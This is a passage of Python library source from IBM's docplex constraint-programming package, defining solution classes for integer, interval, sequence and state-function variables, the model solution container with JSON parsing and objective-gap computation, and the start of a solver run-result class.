Cause given in SearchStopCause.\nSEARCH_STATUS_STOPPED = \"SearchStopped\"\n\n# List of all possible search statuses\nALL_SEARCH_STATUSES = (SEARCH_STATUS_NOT_STARTED, SEARCH_STATUS_ONGOING, SEARCH_STATUS_COMPLETED, SEARCH_STATUS_STOPPED)\n\n\n# Stop cause: Not stopped\nSTOP_CAUSE_NOT_STOPPED = \"SearchHasNotBeenStopped\"\n\n# Stop cause: Search terminated on limit (time limit, fail limit, etc)\nSTOP_CAUSE_LIMIT = \"SearchStoppedByLimit\"\n\n# Stop cause: Exit called while solving, for example by a callback\nSTOP_CAUSE_EXIT = \"SearchStoppedByExit\"\n\n# Stop cause: Search aborted externally\nSTOP_CAUSE_ABORT = \"SearchStoppedByAbort\"\n\n# Stop cause: Unknown cause\nSTOP_CAUSE_UNKNOWN = \"SearchStoppedByUnknownCause\"\n\n# List of all possible stop causes\nALL_STOP_CAUSES = (STOP_CAUSE_NOT_STOPPED, STOP_CAUSE_LIMIT, STOP_CAUSE_EXIT, STOP_CAUSE_ABORT, STOP_CAUSE_UNKNOWN)\n\n\n###############################################################################\n## Public classes\n###############################################################################\n\nclass CpoVarSolution(object):\n \"\"\" This class is a super class of all classes representing a solution to a variable.\n \"\"\"\n __slots__ = ('expr', # Variable expression\n )\n \n def __init__(self, expr):\n \"\"\" Constructor:\n\n Args:\n expr: Variable expression, object of class :class:`~docplex.cp.expression.CpoVariable` or extending class.\n \"\"\"\n # Checking already done by extending classes\n # assert isinstance(expr, CpoVariable), \"Expression 'expr' should be a CPO variable expression\"\n self.expr = expr\n\n\n def get_expr(self):\n \"\"\" Gets the expression of the variable.\n\n Returns:\n Model expression of the variable.\n \"\"\"\n return self.expr\n\n\n def get_name(self):\n \"\"\" Gets the name of the variable.\n\n Returns:\n Name of the variable, None if anonymous.\n \"\"\"\n return self.expr.get_name()\n\n\n def get_value(self):\n \"\"\" Gets the variable value.\n This method is overloaded by each class extending this class.\n\n Returns:\n Value of the variable, represented according to its semantic (see specific variable documentation).\n \"\"\"\n return None\n\n\n def __eq__(self, other):\n \"\"\" Overwrite equality comparison\n\n Args:\n other: Other object to compare with\n Returns:\n True if this object is equal to the other, False otherwise\n \"\"\"\n return utils.equals(self, other)\n\n\n def __ne__(self, other):\n \"\"\" Overwrite inequality comparison \"\"\"\n return not self.__eq__(other)\n\n\n def __str__(self):\n \"\"\" String representing this object \"\"\"\n return \"{}={}\".format(self.expr.get_name(), self.get_value())\n\n\n def __hash__(self):\n return id(self)\n\n\nclass CpoIntVarSolution(CpoVarSolution):\n \"\"\" This class represents a solution to an integer variable.\n\n The solution can be:\n * *complete* when the value is a single integer,\n * *partial* when the value is a domain, set of multiple values.\n\n A domain is a list of discrete integer values and/or intervals of values represented by a tuple containing\n interval min and max values (included).\n\n For example, following are valid domains for an integer variable:\n * 7 (complete solution)\n * (1, 2, 4, 9)\n * (2, 3, (5, 7), 9, (11, 13))\n \"\"\"\n __slots__ = ('value', # Variable value / domain\n )\n\n def __init__(self, expr, value):\n \"\"\" Constructor:\n\n Args:\n expr: Variable expression, object of class :class:`~docplex.cp.expression.CpoIntVar`.\n value: Variable value, or domain if not completely instantiated\n \"\"\"\n assert 
isinstance(expr, CpoIntVar), \"Expression 'expr' should be a CpoIntVar expression\"\n        super(CpoIntVarSolution, self).__init__(expr)\n        self.value = _check_arg_domain(value, 'value')\n\n    def get_value(self):\n        \"\"\" Gets the value of the variable.\n\n        Returns:\n            Variable value (integer), or domain (list of integers or intervals)\n        \"\"\"\n        return self.value\n\n    def get_domain_min(self):\n        \"\"\" Gets the domain lower bound.\n\n        Returns:\n            Domain lower bound.\n        \"\"\"\n        return _domain_min(self.value)\n\n    def get_domain_max(self):\n        \"\"\" Gets the domain upper bound.\n\n        Returns:\n            Domain upper bound.\n        \"\"\"\n        return _domain_max(self.value)\n\n    def domain_iterator(self):\n        \"\"\" Iterator on the individual values of an integer variable domain.\n\n        Returns:\n            Value iterator on the domain of this variable.\n        \"\"\"\n        return _domain_iterator(self.value)\n\n    def domain_contains(self, value):\n        \"\"\" Check whether a given value is in the domain of the variable\n\n        Args:\n            val: Value to check\n        Returns:\n            True if the value is in the domain, False otherwise\n        \"\"\"\n        return _domain_contains(self.value, value)\n\n\nclass CpoFloatVarSolution(CpoVarSolution):\n    # \"\"\" This class represents a solution to a float variable.\n    #\n    # The solution can be:\n    #  * *complete* when the value is a single value,\n    #  * *partial* when the value is an interval.\n    # \"\"\"\n    __slots__ = ('value',  # Variable value or tuple (interval)\n                 )\n\n    def __init__(self, expr, value):\n        \"\"\" Constructor:\n\n        Args:\n            expr: Variable expression, object of class :class:`~docplex.cp.expression.CpoFloatVar`.\n            value: Variable value, or domain if not completely instantiated\n        \"\"\"\n        assert isinstance(expr, CpoFloatVar), \"Expression 'expr' should be a CpoFloatVar expression\"\n        super(CpoFloatVarSolution, self).__init__(expr)\n        self.value = value\n\n    def get_value(self):\n        \"\"\" Gets the value of the variable.\n\n        Returns:\n            Variable value (float), or domain (interval) if not completely instantiated\n        \"\"\"\n        return self.value\n\n    def get_domain_min(self):\n        \"\"\" Gets the domain lower bound.\n\n        Returns:\n            Domain lower bound.\n        \"\"\"\n        return self.value if is_number(self.value) else self.value[0]\n\n    def get_domain_max(self):\n        \"\"\" Gets the domain upper bound.\n\n        Returns:\n            Domain upper bound.\n        \"\"\"\n        return self.value if is_number(self.value) else self.value[-1]\n\n    def __str__(self):\n        \"\"\" Convert this expression into a string \"\"\"\n        return str(self.get_name()) + \": \" + str(self.get_value())\n\n\nclass CpoIntervalVarSolution(CpoVarSolution):\n    \"\"\" This class represents a solution to an interval variable.\n\n    The solution can be complete if all attribute values are integers, or partial if at least one\n    of them is an interval expressed as a tuple.\n    \"\"\"\n    __slots__ = ('start',     # Interval start\n                 'end',       # Interval end\n                 'size',      # Interval size\n                 'length',    # Interval length\n                 'presence',  # Presence indicator\n                 )\n    \n    def __init__(self, expr, presence=None, start=None, end=None, size=None, length=None):\n        \"\"\" Constructor:\n\n        Args:\n            expr: Variable expression, object of class :class:`~docplex.cp.expression.CpoIntervalVar`.\n            presence: Presence indicator (True for present, False for absent, None for undetermined). Default is None.\n            start: Value of start, or tuple representing the start range. Default is None.\n            end: Value of end, or tuple representing the end range. Default is None.\n            size: Value of size, or tuple representing the size range. 
Default is None.\n            length: Value of the length, or tuple representing the length range. Default is None.\n                    Not to be used if other values are integers.\n        \"\"\"\n        assert isinstance(expr, CpoIntervalVar), \"Expression 'expr' should be a CpoIntervalVar expression\"\n        super(CpoIntervalVarSolution, self).__init__(expr)\n        self.presence = presence\n        self.start = start\n        self.end = end\n        self.size = size\n        self.length = length\n\n\n    def is_present(self):\n        \"\"\" Check if the interval is present.\n\n        Returns:\n            True if interval is present, False otherwise.\n        \"\"\"\n        return self.presence is True\n\n\n    def is_absent(self):\n        \"\"\" Check if the interval is absent.\n\n        Returns:\n            True if interval is absent, False otherwise.\n        \"\"\"\n        return self.presence is False\n\n\n    def is_optional(self):\n        \"\"\" Check if the interval is optional.\n        Calling this function always returns False for a complete solution, where the presence of every\n        interval is fixed. It is only meaningful for a partial solution, where the status of the variable\n        may not be fixed yet.\n\n        Returns:\n            True if interval is optional (undetermined), False otherwise.\n        \"\"\"\n        return self.presence is None\n\n\n    def get_start(self):\n        \"\"\" Gets the interval start.\n\n        Returns:\n            Interval start value, or domain (tuple (min, max)) if not fully instantiated.\n            None if interval is absent.\n        \"\"\"\n        return self.start\n\n\n    def get_end(self):\n        \"\"\" Gets the interval end.\n\n        Returns:\n            Interval end value, or domain (tuple (min, max)) if not fully instantiated.\n            None if interval is absent.\n        \"\"\"\n        return self.end\n\n\n    def get_size(self):\n        \"\"\" Gets the size of the interval.\n\n        The size of the interval is the amount of work done in the interval,\n        which depends on the intensity function associated with the interval.\n\n        Returns:\n            Interval size value, or domain (tuple (min, max)) if not fully instantiated.\n            None if interval is absent.\n        \"\"\"\n        return self.size\n\n\n    def get_length(self):\n        \"\"\" Gets the length of the interval.\n\n        Length of the interval is the difference between end and start.\n\n        Returns:\n            Interval length value, or domain (tuple (min, max)) if not fully instantiated.\n            None if interval is absent.\n        \"\"\"\n        if self.length is None:\n            return None if self.end is None else self.end - self.start\n        return self.length\n\n\n    def get_value(self):\n        \"\"\" Gets the interval variable value as a tuple (start, end, size), or () if absent.\n\n        If the variable is absent, then the result is an empty tuple.\n\n        If the variable is fully instantiated, the result is a tuple of 3 integers (start, end, size).\n        The variable length, easy to compute as end - start, can also be retrieved by calling :meth:`get_length`.\n\n        If the variable is partially instantiated, the result is a tuple (start, end, size, length) where each\n        individual value can be an integer or an interval expressed as a tuple.\n\n        Returns:\n            Interval variable value as a tuple.\n        \"\"\"\n        if self.is_present():\n            if self.length is None:\n                return (self.start, self.end, self.size, )\n            else:\n                return (self.start, self.end, self.size, self.length, )\n        return ()\n\n\n    def __str__(self):\n        \"\"\" Convert this expression into a string \"\"\"\n        res = [str(self.get_name()), ': ']\n        if self.is_absent():\n            res.append(\"absent\")\n        else:\n            if self.is_optional():\n                res.append(\"optional\")\n            res.append(\"(start=\" + str(self.get_start()))\n            res.append(\", end=\" + str(self.get_end()))\n            res.append(\", size=\" + str(self.get_size()))\n            res.append(\", length=\" + str(self.get_length()))\n            res.append(\")\")\n        return 
''.join(res)\n\n \nclass CpoSequenceVarSolution(CpoVarSolution):\n \"\"\" This class represents a solution to a sequence variable.\n \"\"\"\n __slots__ = ('lvars', # List of interval variable solutions\n )\n \n def __init__(self, expr, lvars):\n \"\"\" Constructor:\n\n Args:\n expr: Variable expression, object of class :class:`~docplex.cp.expression.CpoSequenceVar`.\n lvars: Ordered list of interval variable solutions that are in this sequence\n (objects of class :class:`CpoIntervalVarSolution`),\n or list of interval variables (object of class :class:`~docplex.cp.expression.CpoIntervalVar`).\n \"\"\"\n assert isinstance(expr, CpoSequenceVar), \"Expression 'expr' should be a CpoSequenceVar expression\"\n super(CpoSequenceVarSolution, self).__init__(expr)\n self.lvars = lvars\n\n\n def get_interval_variables(self):\n \"\"\" Gets the list of CpoIntervalVarSolution in this sequence.\n\n Returns:\n List of CpoIntervalVarSolution in this sequence.\n \"\"\"\n return self.lvars\n\n\n def get_value(self):\n \"\"\" Gets the list of CpoIntervalVarSolution in this sequence.\n\n Returns:\n List of CpoIntervalVarSolution in this sequence.\n \"\"\"\n return self.lvars\n\n\n def __str__(self):\n \"\"\" Convert this expression into a string \"\"\"\n return str(self.get_name()) + \": (\" + \", \".join([str(v.get_name()) for v in self.lvars]) + \")\"\n\n \nclass CpoStateFunctionSolution(CpoVarSolution):\n \"\"\" This class represents a solution to a step function.\n\n A solution to a step function is represented by a list of steps.\n A step is a triplet (start, end, value) that gives the value of the function on the interval [start, end).\n \"\"\"\n __slots__ = ('steps', # List of function steps\n )\n \n def __init__(self, expr, steps):\n \"\"\" Constructor:\n\n Args:\n expr: Variable expression, object of class :class:`~docplex.cp.expression.CpoStateFunction`.\n steps: List of function steps represented as tuples (start, end, value).\n \"\"\"\n assert isinstance(expr, CpoStateFunction), \"Expression 'expr' should be a CpoStateFunction expression\"\n super(CpoStateFunctionSolution, self).__init__(expr)\n self.steps = steps\n\n\n def get_function_steps(self):\n \"\"\" Gets the list of function steps.\n\n Returns:\n List of function steps. Each step is a tuple (start, end, value).\n \"\"\"\n return self.steps\n\n\n def get_value(self):\n \"\"\" Gets the list of function steps. 
Identical to `get_function_steps()`.\n\n Returns:\n List of function steps.\n \"\"\"\n return self.steps\n\n\n def __str__(self):\n \"\"\" Convert this expression into a string \"\"\"\n return str(self.get_name()) + \": (\" + \", \".join([str(s) for s in self.steps]) + \")\"\n \n \nclass CpoModelSolution(object):\n \"\"\" This class represents a solution to the problem represented by the model.\n It contains the solutions for the model variables plus the value of the objective(s), if any.\n\n Each variable solution can be accessed using its name, or the variable object of the model.\n The solution is either :class:`CpoIntVarSolution`, :class:`CpoIntervalVarSolution`,\n :class:`CpoSequenceVarSolution` or :class:`CpoStateFunctionSolution` depending on the type of the variable.\n\n A variable solution can be accessed in two ways:\n\n * using the method :meth:`CpoModelSolution.get_var_solution`, that returns an object representing\n the solution to the variable, or None if the variable is not in the solution.\n * using the standard Python expression `sol[]` that does the same but raises a `KeyError` exception\n if the variable is not in the solution.\n\n Depending if the request to solver was a solve or a propagate, the solution can be:\n * *complete*, if each variable is assigned to a single value,\n * *partial* if not all variables are defined, or if some variables are defined with domains that are not\n restricted to a single value.\n\n An instance of this class may also be created explicitly by the programmer of the model to express a *starting point*\n that can be passed to the model to optimize its solve\n (see :meth:`docplex.cp.model.CpoModel.set_starting_point` for details).\n \"\"\"\n __slots__ = ('var_solutions_dict', # Map of variable solutions. Key is expression id or variable name, value depends on variable\n 'var_solutions_list', # List of variable solutions. 
Value depends on variable\n 'objective_values', # Objective values\n 'objective_bounds', # Objective bound values\n 'objective_gaps', # Objective gap values\n 'kpi_values', # Values of the KPIs\n )\n\n def __init__(self):\n super(CpoModelSolution, self).__init__()\n self.var_solutions_dict = {}\n self.var_solutions_list = []\n self.objective_values = None\n self.objective_bounds = None\n self.objective_gaps = None\n self.kpi_values = OrderedDict()\n\n\n def get_objective_values(self):\n \"\"\" Gets the numeric values of all objectives.\n\n If the solution is partial, each objective value may be an interval expressed as a tuple (min, max)\n\n Returns:\n Array of objective values, None if none.\n \"\"\"\n return self.objective_values\n\n\n def get_objective_bounds(self):\n \"\"\" Gets the numeric values of all objectives bound.\n\n Note that when :meth:`~docplex.cp.modeler.minimize_static_lex` or :meth:`~docplex.cp.modeler.maximize_static_lex` is used,\n the bound values must be taken as a whole, as are the values delivered by :meth:`get_objective_values`.\n One cannot interpret bound values on each criterion independently.\n For example, suppose, we have a problem with two criteria specified to minimize_static_lex,\n a number of workers, and a number of days to complete a job.\n That is, we always prefer to use less workers, but for equal numbers of workers, we prefer to take less days.\n Then a solution with 3 workers and 10 days is perfectly compatible with a lower bound of 2 workers and 13 days,\n even though the lower bound on the number of days is higher than the value in the solution.\n\n Returns:\n Array of all objective bound values, None if none.\n \"\"\"\n return self.objective_bounds\n\n\n def get_objective_gaps(self):\n \"\"\" Gets the numeric values of the gap between objective value and objective bound.\n\n For a single objective, gap is calculated as *gap = abs(value - bound) / max(1e-10, abs(value))*\n\n For multiple objectives, each gap is the gap between corresponding value and bound.\n However, after the first gap whose value is not within optimality tolerance specified by\n :attr:`~docplex.cp.CpoParameters.OptimalityTolerance` and :attr:`~docplex.cp.CpoParameters.RelativeOptimalityTolerance`,\n all returned gap values are positive infinity.\n\n Returns:\n Array of all objective gap values, None if none.\n \"\"\"\n return self.objective_gaps\n\n\n def add_var_solution(self, vsol):\n \"\"\" Add a solution to a variable to this model solution.\n\n Args:\n vsol: Variable solution (object of a class extending :class:`CpoVarSolution`)\n \"\"\"\n assert isinstance(vsol, CpoVarSolution), \"Parameter 'vsol' should be an instance of CpoVarSolution\"\n self.var_solutions_list.append(vsol)\n\n # Add to the dictionary with 2 keys\n var = vsol.expr\n self.var_solutions_dict[id(var)] = vsol\n vname = var.get_name()\n if vname:\n self.var_solutions_dict[vname] = vsol\n\n\n def add_var(self, var, value=None, presence=None, start=None, end=None, size=None):\n \"\"\" Add a solution to a integer or interval variable.\n\n Args:\n var: CPO variable (object of a class extending :class:`~docplex.cp.expression.CpoVariable`)\n value (Optional): Value of the variable if the variable is a integer variable.\n Can be a domain if variable is not completely instantiated.\n presence (Optional): Presence indicator (true for present, false for absent, None for undetermined),\n if the variable is an interval variable.\n start (Optional): Value of start, or tuple representing the start range,\n if the 
variable is an interval variable.\n end (Optional): Value of end, or tuple representing the end range,\n if the variable is an interval variable.\n size (Optional): Value of size, or tuple representing the size range,\n if the variable is an interval variable.\n \"\"\"\n if isinstance(var, CpoIntVar):\n self.add_var_solution(CpoIntVarSolution(var, value))\n elif isinstance(var, CpoIntervalVar):\n self.add_var_solution(CpoIntervalVarSolution(var, presence, start, end, size))\n else:\n raise AssertionError(\"Argument 'var' should be an instance of CpoIntVar or CpoIntervalVar\")\n\n\n def add_integer_var_solution(self, var, value):\n \"\"\" Add a new integer variable solution.\n\n The solution can be complete if the value is a single integer, or partial if the value\n is a domain, given as a list of integers or intervals expressed as tuples.\n\n Args:\n var: Variable expression, object of class :class:`~docplex.cp.expression.CpoIntVar`.\n value: Variable value, or domain if not completely instantiated\n \"\"\"\n self.add_var_solution(CpoIntVarSolution(var, value))\n\n\n def add_interval_var_solution(self, var, presence=None, start=None, end=None, size=None, length=None):\n \"\"\" Add a new interval variable solution.\n\n The solution can be complete if all attribute values are integers, or partial if at least one\n of them is an interval expressed as a tuple.\n\n Args:\n var: Variable expression, object of class :class:`~docplex.cp.expression.CpoIntervalVar`.\n presence: Presence indicator (true for present, false for absent, None for undetermined). Default is None.\n start: Value of start, or tuple representing the start range\n end: Value of end, or tuple representing the end range\n size: Value of size, or tuple representing the size range\n length: Value of the length, or tuple representing the length range. Default is None.\n Not to be used if other values are integers.\n \"\"\"\n self.add_var_solution(CpoIntervalVarSolution(var, presence, start, end, size, length))\n\n\n def get_var_solution(self, expr):\n \"\"\" Gets a variable solution from this model solution.\n\n Args:\n expr: Variable expression or variable name if any\n Returns:\n Variable solution (class extending :class:`CpoVarSolution`),\n None if variable is not found\n \"\"\"\n return self.var_solutions_dict.get(expr) if is_string(expr) else self.var_solutions_dict.get(id(expr))\n\n\n def get_all_var_solutions(self):\n \"\"\" Gets the list of all variable solutions from this model solution.\n\n Returns:\n List of all variable solutions (class extending :class:`CpoVarSolution`).\n \"\"\"\n return self.var_solutions_list\n\n\n def get_value(self, expr):\n \"\"\" Gets the value of a variable or a KPI.\n\n This method first find the variable with :meth:`get_var_solution` and, if exists,\n returns the result of a call to the method get_value() on this variable.\n\n The result depends on the type of the variable. 
For details, please consult documentation of methods:\n\n The expression can also be the name of a KPI.\n\n * :meth:`CpoIntVarSolution.get_value`\n * :meth:`CpoIntervalVarSolution.get_value`\n * :meth:`CpoSequenceVarSolution.get_value`\n * :meth:`CpoStateFunctionSolution.get_value`\n\n Note that the builtin method *__getitem__()* is overwritten to call this method.\n Writing *sol.get_value(x)* is then equivalent to write *sol[x]*.\n\n Args:\n expr: Variable expression, variable name or KPI name.\n Returns:\n Variable value, None if variable is not found.\n Raises:\n KeyError if expression is not in the solution.\n \"\"\"\n var = self.get_var_solution(expr)\n if var is not None:\n return var.get_value()\n return self.get_kpi_value(expr)\n\n\n def set_value(self, var, value):\n \"\"\" Sets the value of a variable.\n\n This method allows to set an integer variable or an interval variable with the short representation\n used to represent it, as returned by :meth:`CpoIntVarSolution.get_value`\n or :meth:`CpoIntervalVarSolution.get_value`.\n\n For an integer variable, value can be:\n\n * If the variable is fully instantiated, a single integer.\n * If the variable is partially instantiated, a domain expressed as a list of integers or intervals.\n\n For an interval variable, value can be:\n\n * If the variable is absent, an empty tuple.\n * If the variable is fully instantiated, a tuple of 3 integers (start, end, size).\n * If the variable is partially instantiated, a tuple (start, end, size, length) where each\n individual value can be an integer or an interval expressed as a tuple.\n\n Note that the builtin method *__setitem__()* is overwritten to call this method.\n Writing *sol.set_value(x, y)* is then equivalent to write *sol[x] = y*.\n\n *New in version 2.9.*\n\n Args:\n var: Model variable\n value: short representation of the variable value\n \"\"\"\n if isinstance(var, CpoIntVar):\n self.add_integer_var_solution(var, value)\n elif isinstance(var, CpoIntervalVar):\n if not value:\n self.add_interval_var_solution(var, presence=False)\n elif len(value) == 3:\n start, end, size = value\n self.add_interval_var_solution(var, presence=True, start=start, end=end, size=size)\n elif len(value) == 4:\n start, end, size, length = value\n self.add_interval_var_solution(var, presence=True, start=start, end=end, size=size, length=length)\n else:\n raise AssertionError(\"Invalid value format for an interval variable\")\n else:\n raise AssertionError(\"Variable that can be set directly are restricted to integer and interval variables\")\n\n\n def add_kpi_value(self, name, value):\n \"\"\" Add a KPI value to this solution\n\n Args:\n name: Name of the KPI\n value: Model variable representing this KPI\n \"\"\"\n self.kpi_values[name] = value\n\n\n def get_kpis(self):\n \"\"\" Get the solution KPIs.\n\n Returns:\n Ordered dictionary containing value of the KPIs that have been defined in the model.\n Key is KPI publish name, value is expression value.\n Keys are sorted in the order the KPIs have been defined.\n \"\"\"\n return self.kpi_values\n\n\n def get_kpi_value(self, name):\n \"\"\" Get the value of a KPI\n\n Args:\n name: Name of the KPI\n Returns:\n Value of the KPI\n Raises:\n KeyError if KPI is not in the solution.\n \"\"\"\n return self.kpi_values[name]\n\n\n def is_empty(self):\n \"\"\" Check whether this solution contains any information\n\n Returns:\n True if there is no objective value and no variable\n \"\"\"\n return (self.objective_values is None) and (not self.var_solutions_dict)\n\n\n def 
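The short value representations accepted by set_value() (and, per the note above, by the overloaded sol[var] = value) can be summarized in a few lines; this continues the hypothetical sol/x/t from the previous sketch:

```python
# Integer variable: a single int (fixed), or a domain when partially instantiated.
sol[x] = 7                       # fixed value
sol[x] = [1, (3, 5), 9]          # domain {1, 3, 4, 5, 9}

# Interval variable: () for absent, (start, end, size) when fully fixed,
# (start, end, size, length) with tuple ranges when only partially fixed.
sol[t] = ()                      # absent
sol[t] = (0, 5, 5)               # present: start=0, end=5, size=5
sol[t] = ((0, 2), (5, 7), 5, 5)  # start in [0, 2], end in [5, 7]
```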
map_solution(self, sobj):\n \"\"\" Map a python object on this solution.\n\n This method builds a copy of the source object and replace in its attributes all occurrences of\n model expressions by their value in this solution.\n This method is called recursively on all child objects.\n\n Args:\n sobj: Source object\n Returns:\n Copy of the source object where model expressions are replaced by their values\n \"\"\"\n return replace(sobj, self.get_value)\n\n\n def _add_json_solution(self, jsol, expr_map, model, prms):\n \"\"\" Add a json solution to this solution descriptor\n\n Args:\n jsol: JSON document representing solution.\n expr_map: Map of model expressions. Key is name in JSON document, value is corresponding model expression.\n model: Source model\n prms: Solving parameters\n \"\"\"\n # Add objectives\n ovals = jsol.get('objectives')\n if ovals:\n self.objective_values = tuple([_get_interval(v) for v in ovals])\n\n # Add objectives bounds\n bvals = jsol.get('bounds')\n if bvals:\n self.objective_bounds = tuple([_get_num_value(x) for x in bvals])\n\n # Add objectives gaps\n gvals = jsol.get('gaps')\n if gvals:\n self.objective_gaps = tuple([_get_num_value(x) for x in gvals])\n elif ovals and bvals and not any(is_array(v) for v in ovals):\n # Gaps not given but bounds present. Recompute gaps\n gvals = []\n rt = prms.RelativeOptimalityTolerance\n at = prms.OptimalityTolerance\n intol = True\n for v, b in zip(self.objective_values, self.objective_bounds):\n if intol:\n gap = _compute_gap(v, b)\n intol = _is_below_tolerance(v, b, rt, at)\n else:\n gap = POSITIVE_INFINITY\n gvals.append(gap)\n self.objective_gaps = tuple(gvals)\n else:\n self.objective_gaps = None\n\n # Add integer variables\n vars = jsol.get('intVars', ())\n for vname in vars:\n var = _get_expr_from_map(expr_map, vname)\n self.add_var_solution(CpoIntVarSolution(var, _get_domain(vars[vname])))\n\n # Add integer variables\n vars = jsol.get('floatVars', ())\n for vname in vars:\n var = _get_expr_from_map(expr_map, vname)\n self.add_var_solution(CpoFloatVarSolution(var, _get_domain(vars[vname])))\n\n # Add interval variables\n vars = jsol.get('intervalVars', ())\n for vname in vars:\n var = _get_expr_from_map(expr_map, vname)\n v = vars[vname]\n if 'start' in v:\n # Check partially instantiated\n if 'presence' in v:\n vsol = CpoIntervalVarSolution(var, True if v['presence'] == 1 else None,\n _get_domain(v['start']), _get_domain(v['end']), _get_domain(v['size']))\n vsol.length = _get_domain(v['length'])\n else:\n vsol = CpoIntervalVarSolution(var, True, _get_num_value(v['start']), _get_num_value(v['end']), _get_num_value(v['size']))\n else:\n vsol = CpoIntervalVarSolution(var, False)\n self.add_var_solution(vsol)\n\n # Add sequence variables (MUST be done after single variables)\n vars = jsol.get('sequenceVars', ())\n for vname in vars:\n var = _get_expr_from_map(expr_map, vname)\n vnlist = [v for v in vars[vname]]\n ivres = [self.get_var_solution(vn) for vn in vnlist]\n #ivres = [_get_expr_from_map(expr_map, vn) for vn in vnlist] Should have been this instead of previous line\n self.add_var_solution(CpoSequenceVarSolution(var, ivres))\n\n # Add state functions\n funs = jsol.get('stateFunctions', ())\n for fname in funs:\n fun = _get_expr_from_map(expr_map, fname)\n lpts = [( _get_num_value(v['start']), _get_num_value(v['end']), _get_num_value(v['value'])) for v in funs[fname]]\n self.add_var_solution(CpoStateFunctionSolution(fun, lpts))\n\n # Set kpis\n kpi_values = jsol.get('KPIs', {})\n kpis = model.get_kpis()\n try:\n for 
name, (expr, loc) in kpis.items():\n if isinstance(expr, types.FunctionType):\n # KPI is a lambda expression\n value = expr(self)\n elif name in kpi_values:\n # KPI is a solver KPI\n value = kpi_values[name]\n else:\n # KPI is a model variable\n value = self.get_value(expr)\n self.add_kpi_value(name, value)\n except:\n # Solution has no values\n pass\n\n\n def __getitem__(self, expr):\n \"\"\" Overloading of [] to get a variable solution from this model solution\n\n Args:\n expr: Variable expression or variable name if any\n Returns:\n Variable solution (class CpoVarSolution)\n \"\"\"\n return self.get_value(expr)\n\n\n def __setitem__(self, var, value):\n \"\"\" Overloading of [] to set a variable solution in this model solution\n\n Args:\n var: Variable expression\n value: Variable value\n Returns:\n Variable solution (class CpoVarSolution)\n \"\"\"\n return self.set_value(var, value)\n\n\n def __contains__(self, expr):\n \"\"\" Overloading of 'in' to check that a variable solution is in this model solution\n\n Args:\n expr: Variable expression or variable name if any\n Returns:\n True if this model solution contains a solution for this variable.\n \"\"\"\n return self.get_var_solution(expr) is not None\n\n\n def print_solution(self, out=None):\n \"\"\" Prints the solution on a given output.\n\n If the given output is a string, it is considered as a file name that is opened by this method\n using 'utf-8' encoding.\n\n DEPRECATED. Use :meth:`write` instead.\n\n Args:\n out: Target output stream or output file, standard output if not given.\n \"\"\"\n self.write(out)\n\n\n def write(self, out=None):\n \"\"\" Write the solution.\n\n If the given output is a string, it is considered as a file name that is opened by this method\n using 'utf-8' encoding.\n\n Args:\n out (Optional): Target output stream or file name. 
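Taken together, the operator overloads make a solution read like a dictionary; a short usage sketch with the hypothetical x from earlier:

```python
if x in sol:          # __contains__: is there a solution for x?
    print(sol[x])     # __getitem__: same as sol.get_value(x)
sol[x] = 3            # __setitem__: same as sol.set_value(x, 3)
sol.write()           # dump the whole solution to sys.stdout
```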
If not given, default value is sys.stdout.\n \"\"\"\n # Check file\n if is_string(out):\n with open_utf8(os.path.abspath(out), mode='w') as f:\n self.write(f)\n return\n # Check default output\n if out is None:\n out = sys.stdout\n\n # Print objective value, bounds and gaps\n ovals = self.get_objective_values()\n if ovals:\n out.write(u\"Objective values: {}\".format(ovals))\n bvals = self.get_objective_bounds()\n if bvals:\n if ovals:\n out.write(u\", bounds: {}\".format(bvals))\n else:\n out.write(u\"Bounds: {}\".format(bvals))\n gvals = self.get_objective_gaps()\n if gvals:\n out.write(u\", gaps: {}\".format(gvals))\n out.write(u\"\\n\")\n\n # Print all variables in natural name order\n lvars = [v for v in self.get_all_var_solutions() if v.get_name()]\n lvars = sorted(lvars, key=functools.cmp_to_key(lambda v1, v2: compare_expressions(v1.expr, v2.expr)))\n for v in lvars:\n out.write(str(v))\n out.write(u'\\n')\n\n # Print all KPIs in declaration order\n kpis = self.get_kpis()\n for k in kpis.keys():\n out.write(u'{}: {}\\n'.format(k, kpis[k]))\n\n\n def __str__(self):\n \"\"\" Build a short string representation of this object.\n Returns:\n String representation of this object.\n \"\"\"\n return \"(objs: {}, bnds: {}, gaps: {}\".format(self.get_objective_values(), self.get_objective_bounds(), self.get_objective_gaps())\n\n\n def __eq__(self, other):\n \"\"\" Overwrite equality comparison\n\n Args:\n other: Other object to compare with\n Returns:\n True if this object is equal to the other, False otherwise\n \"\"\"\n return utils.equals(self, other)\n\n\n def __ne__(self, other):\n \"\"\" Overwrite inequality comparison \"\"\"\n return not self.__eq__(other)\n\n\nclass CpoRunResult(object):\n \"\"\" This class is an abstract class extended by classes representing the result of a call to the solver.\n\n It contains the following elements:\n * model that has been solved,\n * solver parameters,\n * solver information,\n * solver output log, if configuration has been set to store it (default).\n \"\"\"\n def __init__(self, model):\n super(CpoRunResult, self).__init__()\n self.model = model # Source model\n self.solver_log = None # Solver log\n self.process_infos = CpoProcessInfos() # Process information\n self.parameters = CpoParameters() # Solving parameters\n self.solver_infos = CpoSolverInfos() # Solving information\n\n\n def get_model(self):\n \"\"\" Gets the source model\n\n Returns:\n Source model, object of class :class:`~docplex.cp.model.CpoModel`\n \"\"\"\n return self.model\n\n\n def _set_solver_log(self, log):\n \"\"\" Set the solver log as a string.\n\n Args:\n log (str): Log of the solver\n \"\"\"\n self.solver_log = log\n\n\n def get_solver_log(self):\n \"\"\" Gets the log of the solver.\n\n Returns:\n Solver log as a string, None if unknown.\n \"\"\"\n return self.solver_log\n\n\n def get_process_infos(self):\n \"\"\" Gets the set of informations provided by the Python API concerning the solving of the model.\n\n Returns:\n Object of class :class:`CpoProcessInfos` that contains general information on model processing.\n \"\"\"\n return self.process_infos\n\n\n def get_process_info(self, name, default=None):\n \"\"\" Get a particular process information.\n\n Args:\n name: Name of the process info to get\n default: (optional) Default value if not found. 
